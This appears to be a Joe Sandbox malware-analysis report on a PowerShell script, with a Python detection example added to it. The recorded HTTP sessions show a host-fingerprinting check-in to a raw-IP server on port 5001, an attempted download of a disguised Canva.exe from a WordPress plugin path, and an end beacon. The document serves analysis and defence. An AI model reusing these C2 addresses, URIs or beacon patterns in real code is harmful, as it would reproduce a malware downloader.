                                      2025-02-18T08:27:32.949584+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.5 | 49706 | 172.67.149.252 | 443 | TCP
                                      2025-02-18T08:27:32.949584+0100 | 2021697 | ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious | 1 | 192.168.2.5 | 49706 | 172.67.149.252 | 443 | TCP
                                      2025-02-18T08:27:33.894508+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.5 | 49707 | 91.206.178.120 | 5001 | TCP
                                      2025-02-18T08:27:33.894508+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49707 | 91.206.178.120 | 5001 | TCP
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Feb 18, 2025 08:27:29.287914991 CET | 49704 | 80 | 192.168.2.5 | 104.26.12.205
                                      Feb 18, 2025 08:27:29.292819977 CET | 80 | 49704 | 104.26.12.205 | 192.168.2.5
                                      Feb 18, 2025 08:27:29.292892933 CET | 49704 | 80 | 192.168.2.5 | 104.26.12.205
                                      Feb 18, 2025 08:27:29.294413090 CET | 49704 | 80 | 192.168.2.5 | 104.26.12.205
                                      Feb 18, 2025 08:27:29.299273968 CET | 80 | 49704 | 104.26.12.205 | 192.168.2.5
                                      Feb 18, 2025 08:27:29.775172949 CET | 80 | 49704 | 104.26.12.205 | 192.168.2.5
                                      Feb 18, 2025 08:27:29.827006102 CET | 49704 | 80 | 192.168.2.5 | 104.26.12.205
                                      Feb 18, 2025 08:27:30.920710087 CET | 49705 | 5001 | 192.168.2.5 | 91.206.178.120
                                      Feb 18, 2025 08:27:30.925585032 CET | 5001 | 49705 | 91.206.178.120 | 192.168.2.5
                                      Feb 18, 2025 08:27:30.925662994 CET | 49705 | 5001 | 192.168.2.5 | 91.206.178.120
                                      Feb 18, 2025 08:27:30.925812006 CET | 49705 | 5001 | 192.168.2.5 | 91.206.178.120
                                      Feb 18, 2025 08:27:30.930573940 CET | 5001 | 49705 | 91.206.178.120 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.037771940 CET | 5001 | 49705 | 91.206.178.120 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.047979116 CET | 5001 | 49705 | 91.206.178.120 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.048026085 CET | 49705 | 5001 | 192.168.2.5 | 91.206.178.120
                                      Feb 18, 2025 08:27:32.048110008 CET | 5001 | 49705 | 91.206.178.120 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.048154116 CET | 49705 | 5001 | 192.168.2.5 | 91.206.178.120
                                      Feb 18, 2025 08:27:32.054188967 CET | 49705 | 5001 | 192.168.2.5 | 91.206.178.120
                                      Feb 18, 2025 08:27:32.058970928 CET | 5001 | 49705 | 91.206.178.120 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.083800077 CET | 49706 | 443 | 192.168.2.5 | 172.67.149.252
                                      Feb 18, 2025 08:27:32.083844900 CET | 443 | 49706 | 172.67.149.252 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.083904028 CET | 49706 | 443 | 192.168.2.5 | 172.67.149.252
                                      Feb 18, 2025 08:27:32.105271101 CET | 49706 | 443 | 192.168.2.5 | 172.67.149.252
                                      Feb 18, 2025 08:27:32.105293989 CET | 443 | 49706 | 172.67.149.252 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.576041937 CET | 443 | 49706 | 172.67.149.252 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.576144934 CET | 49706 | 443 | 192.168.2.5 | 172.67.149.252
                                      Feb 18, 2025 08:27:32.581047058 CET | 49706 | 443 | 192.168.2.5 | 172.67.149.252
                                      Feb 18, 2025 08:27:32.581063986 CET | 443 | 49706 | 172.67.149.252 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.581434011 CET | 443 | 49706 | 172.67.149.252 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.601953030 CET | 49706 | 443 | 192.168.2.5 | 172.67.149.252
                                      Feb 18, 2025 08:27:32.643341064 CET | 443 | 49706 | 172.67.149.252 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.949596882 CET | 443 | 49706 | 172.67.149.252 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.949713945 CET | 443 | 49706 | 172.67.149.252 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.949939966 CET | 49706 | 443 | 192.168.2.5 | 172.67.149.252
                                      Feb 18, 2025 08:27:32.982810974 CET | 49706 | 443 | 192.168.2.5 | 172.67.149.252
                                      Feb 18, 2025 08:27:33.203931093 CET | 49707 | 5001 | 192.168.2.5 | 91.206.178.120
                                      Feb 18, 2025 08:27:33.208828926 CET | 5001 | 49707 | 91.206.178.120 | 192.168.2.5
                                      Feb 18, 2025 08:27:33.210850000 CET | 49707 | 5001 | 192.168.2.5 | 91.206.178.120
                                      Feb 18, 2025 08:27:33.214157104 CET | 49707 | 5001 | 192.168.2.5 | 91.206.178.120
                                      Feb 18, 2025 08:27:33.218960047 CET | 5001 | 49707 | 91.206.178.120 | 192.168.2.5
                                      Feb 18, 2025 08:27:33.884543896 CET | 5001 | 49707 | 91.206.178.120 | 192.168.2.5
                                      Feb 18, 2025 08:27:33.894414902 CET | 5001 | 49707 | 91.206.178.120 | 192.168.2.5
                                      Feb 18, 2025 08:27:33.894437075 CET | 5001 | 49707 | 91.206.178.120 | 192.168.2.5
                                      Feb 18, 2025 08:27:33.894507885 CET | 49707 | 5001 | 192.168.2.5 | 91.206.178.120
                                      Feb 18, 2025 08:27:33.911699057 CET | 49707 | 5001 | 192.168.2.5 | 91.206.178.120
                                      Feb 18, 2025 08:27:33.916495085 CET | 5001 | 49707 | 91.206.178.120 | 192.168.2.5
                                      Feb 18, 2025 08:27:34.169028044 CET | 49704 | 80 | 192.168.2.5 | 104.26.12.205
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Feb 18, 2025 08:27:29.273791075 CET | 53940 | 53 | 192.168.2.5 | 1.1.1.1
                                      Feb 18, 2025 08:27:29.280877113 CET | 53 | 53940 | 1.1.1.1 | 192.168.2.5
                                      Feb 18, 2025 08:27:32.061628103 CET | 51512 | 53 | 192.168.2.5 | 1.1.1.1
                                      Feb 18, 2025 08:27:32.082998037 CET | 53 | 51512 | 1.1.1.1 | 192.168.2.5
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Feb 18, 2025 08:27:29.273791075 CET | 192.168.2.5 | 1.1.1.1 | 0x3059 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                      Feb 18, 2025 08:27:32.061628103 CET | 192.168.2.5 | 1.1.1.1 | 0xd46 | Standard query (0) | hostelaunpaso.com | A (IP address) | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Feb 18, 2025 08:27:29.280877113 CET | 1.1.1.1 | 192.168.2.5 | 0x3059 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                      Feb 18, 2025 08:27:29.280877113 CET | 1.1.1.1 | 192.168.2.5 | 0x3059 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                      Feb 18, 2025 08:27:29.280877113 CET | 1.1.1.1 | 192.168.2.5 | 0x3059 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                      Feb 18, 2025 08:27:32.082998037 CET | 1.1.1.1 | 192.168.2.5 | 0xd46 | No error (0) | hostelaunpaso.com | | 172.67.149.252 | A (IP address) | IN (0x0001) | false
                                      Feb 18, 2025 08:27:32.082998037 CET | 1.1.1.1 | 192.168.2.5 | 0xd46 | No error (0) | hostelaunpaso.com | | 104.21.29.239 | A (IP address) | IN (0x0001) | false
                                      • hostelaunpaso.com
                                      • api.ipify.org
                                      • 91.206.178.120:5001
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.5 | 49704 | 104.26.12.205 | 80 | 5676 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Feb 18, 2025 08:27:29.294413090 CET | 158 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: api.ipify.org
                                      Connection: Keep-Alive
                                      Feb 18, 2025 08:27:29.775172949 CET | 431 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 18 Feb 2025 07:27:29 GMT
                                      Content-Type: text/plain
                                      Content-Length: 12
                                      Connection: keep-alive
                                      Vary: Origin
                                      cf-cache-status: DYNAMIC
                                      Server: cloudflare
                                      CF-RAY: 913c4b82b8b08c29-EWR
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2061&min_rtt=2061&rtt_var=1030&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=158&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                      Data Ascii: 8.46.123.189


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.2.5 | 49705 | 91.206.178.120 | 5001 | 5676 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Feb 18, 2025 08:27:30.925812006 CET | 264 | OUT | GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=91530 HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: 91.206.178.120:5001
                                      Connection: Keep-Alive
                                      Feb 18, 2025 08:27:32.037771940 CET | 174 | IN | HTTP/1.1 200 OK
                                      Server: Werkzeug/3.1.3 Python/3.10.12
                                      Date: Tue, 18 Feb 2025 07:27:31 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 21
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.5 | 49707 | 91.206.178.120 | 5001 | 5676 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Feb 18, 2025 08:27:33.214157104 CET | 170 | OUT | GET /script_end?random_number=91530 HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: 91.206.178.120:5001
                                      Feb 18, 2025 08:27:33.884543896 CET | 174 | IN | HTTP/1.1 200 OK
                                      Server: Werkzeug/3.1.3 Python/3.10.12
                                      Date: Tue, 18 Feb 2025 07:27:33 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 19
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.5 | 49706 | 172.67.149.252 | 443 | 5676 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-02-18 07:27:32 UTC | 246 | OUT | GET /wp-content/plugins/motopress-hotel-booking/templates/create-booking/search/Canva.exe HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: hostelaunpaso.com
                                      Connection: Keep-Alive
                                      2025-02-18 07:27:32 UTC | 869 | IN | HTTP/1.1 403 Forbidden
                                      Date: Tue, 18 Feb 2025 07:27:32 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      strict-transport-security: max-age=15768000; includeSubDomains
                                      cf-cache-status: BYPASS
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzbYHRAAxRQwPViaa0Jrqj8yy13yAZ1OBap9FJFhjh9sL9TpCvVg1PyAW3OZLJHk9mzXqt6Ou9%2FtQ3vrC5dkMWLB5Pr4f6vjcrblJX81xLBqmeiG98dYijoZCIXU%2FW7H2EmSDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 913c4b951a752394-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1934&rtt_var=734&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=860&delivery_rate=1481481&cwnd=252&unsent_bytes=0&cid=f72ead2660dac038&ts=393&x=0"
                                      2025-02-18 07:27:32 UTC | 500 | IN | Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72
                                      Data Ascii: 31b<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>403 Forbidden</title> <link r
                                      2025-02-18 07:27:32 UTC | 302 | IN | Data Raw: 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f
                                      Data Ascii: this document.</p> <hr/> <p>That's what you can do</p> <div class="help-actions"> <a href="javascript:location.reload();">Reload Page</a> <a href="javascript:history.back();">Back to Previous Page</a> <a href="/">Home Page</
                                      2025-02-18 07:27:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0
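The four requests above form one chain: a public-IP lookup against api.ipify.org, a check-in to a raw IP on port 5001 that carries the host's IP, OS version and memory size plus a random_number token, a download attempt for Canva.exe from a WordPress plugin path (refused with a 403 in this run), and a final /script_end beacon reusing the same token. The script below is an added example, not part of this Joe Sandbox report, that scores such requests from a proxy- or Zeek-style HTTP log and pairs the start/end beacons by their token. The HttpRequest field set, the indicator names and the STANDARD_HTTP_PORTS list are assumptions for the example; the four sample records are constructed from the sessions recorded above.

```python
"""Triage of PowerShell check-in traffic of the kind recorded in this report.

Added example (not the sandbox's or the malware author's code). It scores single HTTP
requests for the indicators the report surfaces and correlates /script_start and
/script_end beacons that share a random_number token.
"""
from dataclasses import dataclass
from ipaddress import ip_address
from urllib.parse import parse_qs, urlsplit

# User-Agent seen on every request in the report (the default Invoke-WebRequest UA).
PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"


@dataclass(frozen=True)
class HttpRequest:
    """Minimal request record; field set is an assumption for the example."""
    src_ip: str
    dst_ip: str
    dst_port: int
    host: str        # Host header as sent, may carry ":port"
    method: str
    uri: str         # request-target: path plus query
    user_agent: str


# Constructed sample: the four requests from the report's HTTP/HTTPS sessions, in order.
SAMPLE_REQUESTS = [
    HttpRequest("192.168.2.5", "104.26.12.205", 80, "api.ipify.org", "GET", "/", PS_UA),
    HttpRequest("192.168.2.5", "91.206.178.120", 5001, "91.206.178.120:5001", "GET",
                "/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0"
                "&memory=4&random_number=91530", PS_UA),
    HttpRequest("192.168.2.5", "172.67.149.252", 443, "hostelaunpaso.com", "GET",
                "/wp-content/plugins/motopress-hotel-booking/templates/create-booking/search/Canva.exe",
                PS_UA),
    HttpRequest("192.168.2.5", "91.206.178.120", 5001, "91.206.178.120:5001", "GET",
                "/script_end?random_number=91530", PS_UA),
]

STANDARD_HTTP_PORTS = {80, 443, 8080, 8443}   # assumption: anything else counts as non-standard
FINGERPRINT_PARAMS = {"ip", "os", "memory"}   # host profile the script puts in the check-in query
IP_ECHO_HOSTS = {"api.ipify.org"}             # public-IP lookup service contacted in the report


def host_is_raw_ip(host: str) -> bool:
    """True when the Host header is a literal IP (with or without :port) rather than a name."""
    name = host[1:host.index("]")] if host.startswith("[") else host.split(":")[0]
    try:
        ip_address(name)
    except ValueError:
        return False
    return True


def flag_request(req: HttpRequest) -> list[str]:
    """Indicators a single request trips, in a fixed order; an empty list means nothing matched."""
    parts = urlsplit(req.uri)
    params = parse_qs(parts.query)
    reasons = []
    if "WindowsPowerShell/" in req.user_agent:
        reasons.append("powershell_user_agent")
    if host_is_raw_ip(req.host):
        reasons.append("raw_ip_host")
    if req.dst_port not in STANDARD_HTTP_PORTS:
        reasons.append("nonstandard_port")
    if req.host.split(":")[0] in IP_ECHO_HOSTS:
        reasons.append("public_ip_lookup")
    if FINGERPRINT_PARAMS.issubset(params):
        reasons.append("host_fingerprint_in_query")
    if parts.path.lower().endswith(".exe") and "/wp-content/" in parts.path:
        reasons.append("exe_from_wordpress_path")
    return reasons


def correlate_checkins(requests: list[HttpRequest]) -> dict[str, dict]:
    """Pair /script_start and /script_end beacons that share a random_number token."""
    sessions: dict[str, dict] = {}
    for req in requests:
        parts = urlsplit(req.uri)
        token = parse_qs(parts.query).get("random_number", [None])[0]
        if token is None:
            continue
        entry = sessions.setdefault(
            token, {"dst": f"{req.dst_ip}:{req.dst_port}", "start": False, "end": False})
        if parts.path.endswith("/script_start"):
            entry["start"] = True
        elif parts.path.endswith("/script_end"):
            entry["end"] = True
    return sessions


def triage(requests: list[HttpRequest]) -> tuple[dict[str, list[str]], list[str]]:
    """Per-request indicators, plus the tokens whose start/end pair both appeared."""
    flagged = {f"{r.method} {r.host}{r.uri}": flag_request(r) for r in requests}
    sessions = correlate_checkins(requests)
    complete = [tok for tok, s in sessions.items() if s["start"] and s["end"]]
    return flagged, complete


if __name__ == "__main__":
    flagged, complete = triage(SAMPLE_REQUESTS)
    for key, reasons in flagged.items():
        print(f"{key[:72]:<72} {', '.join(reasons) or '-'}")
    print("completed check-in pairs:", complete)
```

The token pairing is what separates this traffic from a one-off PowerShell download: the same random_number appears in two requests to the same raw-IP:port, bracketing the payload fetch, so a completed pair is a stronger signal than any single indicator. The public-IP lookup on its own is weak (many legitimate scripts do it) and is kept as a low-weight indicator only.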


                                      Target ID:0
                                      Start time:02:27:26
                                      Start date:18/02/2025
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1"
                                      Imagebase:0xac0000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:1
                                      Start time:02:27:27
                                      Start date:18/02/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:02:27:27
                                      Start date:18/02/2025
                                      Path:C:\Windows\System32\notepad.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\oNvY66Z8jp.ps1"
                                      Imagebase:0x7ff7144b0000
                                      File size:201'216 bytes
                                      MD5 hash:27F71B12CB585541885A31BE22F61C83
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$4']q$4']q
                                        • API String ID: 0-1785108022
                                        • Opcode ID: c52428738af162d1c0a7aedc3721e237a00c24bfda4d8aa22546b1427065c56b
                                        • Instruction ID: 3a4654dad837ce9e81aabb2fcee838ce55e6c5395f2ed78667cfa39c2f4f71e0
                                        • Opcode Fuzzy Hash: c52428738af162d1c0a7aedc3721e237a00c24bfda4d8aa22546b1427065c56b
                                        • Instruction Fuzzy Hash: C0125932F042048FD765AB78881177ABFA6EFC1321F1484BAE505DBA91DB31DA41C7E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q$4']q
                                        • API String ID: 0-705557208
                                        • Opcode ID: 4664443e749f970152e5d46eb16f5a2e6a125cea233c60b37713377b38c70964
                                        • Instruction ID: 7ffb2483adc4aa5ec5578cdf1810973a1bce49462a63f3f6537b382e8d722bcf
                                        • Opcode Fuzzy Hash: 4664443e749f970152e5d46eb16f5a2e6a125cea233c60b37713377b38c70964
                                        • Instruction Fuzzy Hash: EA11FEB1F0A350DFD7BA372454602653F945F5793031905ABD442CFAD9DA2B8C45C7E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q
                                        • API String ID: 0-3120983240
                                        • Opcode ID: 286169fde3618c040c2beeb4d26156098ef0670a17a82610c67ce38017ced36c
                                        • Instruction ID: 3216f67439cea6d7608dfb28498a0da1f172d10b69f04ecbadb4ddb6536a8a54
                                        • Opcode Fuzzy Hash: 286169fde3618c040c2beeb4d26156098ef0670a17a82610c67ce38017ced36c
                                        • Instruction Fuzzy Hash: 1421B7B2A8B7945FC75A37A434B01A13FD8CF4323035A04AAD0558FEA5C922C886C3A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q
                                        • API String ID: 0-3120983240
                                        • Opcode ID: 86d5fbef094639b85a9692cdae5ae4f6e1f1250b0b560ac6a0e2491872221905
                                        • Instruction ID: 0be690b258b3d57a2b15bb3a8c5043de8f4fcb5204925f4cd45564caf296374c
                                        • Opcode Fuzzy Hash: 86d5fbef094639b85a9692cdae5ae4f6e1f1250b0b560ac6a0e2491872221905
                                        • Instruction Fuzzy Hash: C5012871B0F3409FD7A6372418202613FAD5F4BA2071649DBD481CF6D9CD268C88C7A3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: d341dba1f7f8119ada715dd290c4f87e661dc013f6ed56b660c506d380c079da
                                        • Instruction ID: 32c476aa378eefe6ab31bfe8d468b588fd654000ab886194ee384ec2275418ab
                                        • Opcode Fuzzy Hash: d341dba1f7f8119ada715dd290c4f87e661dc013f6ed56b660c506d380c079da
                                        • Instruction Fuzzy Hash: 3101D871A4E3964FD3A7172C1850116AFF25FD35107294897CA81CF563CD385C49C7A3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q$4']q
                                        • API String ID: 0-3120983240
                                        • Opcode ID: b3072d01583e7a8238dedf487af40aa68c3f7a1a7507a24164c2e2f77cd58bfd
                                        • Instruction ID: 87b110d6e33cef7f128a32452af5ec124eb7febd509d80b793fa2695ae4525dd
                                        • Opcode Fuzzy Hash: b3072d01583e7a8238dedf487af40aa68c3f7a1a7507a24164c2e2f77cd58bfd
                                        • Instruction Fuzzy Hash: 10F0B430F79609CFDAA47A24959422A3ED9AF41B10B50092DD8425B994CF35DC45CBC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q
                                        • API String ID: 0-1259897404
                                        • Opcode ID: 861476d03fc9d6de3504acb5340766ac6c288b3182d8f4bc5ceebed1fedb20ec
                                        • Instruction ID: 344dcef5cf35aacf21f0d19a0c0ce32d350cc02b544e4bef985ea7be352de973
                                        • Opcode Fuzzy Hash: 861476d03fc9d6de3504acb5340766ac6c288b3182d8f4bc5ceebed1fedb20ec
                                        • Instruction Fuzzy Hash: 69F0D6323483402BD718A735AC51B9E3B5BAFC5710F544969E0455B297CD64BC0947A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_46a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q
                                        • API String ID: 0-1259897404
                                        • Opcode ID: 969a8d7e86a72a9c1421b8d6343aa10dd2aa581fd29fdd6b0d09918945fb6220
                                        • Instruction ID: a185c3c8e0bbaf5546cd6e196b5525ce0619b2f010a00e251a2d20e5fbaf9f64
                                        • Opcode Fuzzy Hash: 969a8d7e86a72a9c1421b8d6343aa10dd2aa581fd29fdd6b0d09918945fb6220
                                        • Instruction Fuzzy Hash: 9CF0F6313443002BD71CA639AC91B5E379BEFC4B10F504978E1065B3D6CEA0FC094395
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181658049.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6f40000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49cbb9b5529cec314ba7564684f8284b8c9c3c7b98b14a9d900efec3e28fcb62
                                        • Instruction ID: 95cd3a3d35f932e1cb7a59d3f52381311faff0cf161b64f52916d3e6043ff0d9
                                        • Opcode Fuzzy Hash: 49cbb9b5529cec314ba7564684f8284b8c9c3c7b98b14a9d900efec3e28fcb62
                                        • Instruction Fuzzy Hash: 0D515632B043059FDB606B2888507BBBFA6DFC1321F14847AE645DBA91DF76C851C7A2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2176260497.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
